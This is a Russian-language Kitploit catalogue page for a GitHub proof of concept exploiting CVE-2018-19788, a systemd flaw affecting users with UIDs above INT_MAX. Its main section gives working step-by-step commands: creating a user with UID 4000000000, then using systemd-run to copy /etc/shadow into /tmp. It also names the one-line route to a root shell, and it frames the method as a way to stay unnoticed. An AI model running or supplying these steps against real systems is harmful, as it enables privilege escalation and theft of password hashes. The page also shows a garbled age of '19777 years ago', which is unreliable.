Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC — Эксплуатация CVE-2018-19788 без root-shell | Kitploit
Инструменты/GitHubGitHub/ekultek/poc
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubekultek/poc

PoC

Эксплуатация CVE-2018-19788 без root-shell

Репозиторий
19777 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Использование CVE-2018-19788 для дампа защищенных файлов без root-оболочки

CVE-2018-19788 — это проблема, при которой любой пользователь с UID больше INT_MAX (т.е. 4000000000) может выполнять любые команды systemctl на системе с systemd, например Ubuntu. (Уже есть описание получения root-оболочки: здесь). Основное отличие этого описания от полного получения root-оболочки заключается в том, что здесь команды выполняются от самого пользователя, а не от root (по сути, просто PoC).

Получение /etc/shadow без выполнения root-оболочки

Чтобы получить root-оболочку, достаточно выполнить systemd-run -t /bin/bash, но если вы хотите оставаться незамеченным, можно выполнить простые команды для получения привилегированных файлов без терминала. Выполните следующие шаги:

  • Добавьте пользователя с UID больше INT_MAX:
    adduser --uid 4000000000 someusername
    
  • Переключитесь на учетную запись пользователя:
    su someusername
    
  • Выполните команду для нужного файла (в примере используем /etc/shadow):
    systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt'
    
  • Ваш файл теперь в /tmp:
    cat /tmp/results_poc.txt
    

Видео PoC

to_video

Скачать инструмент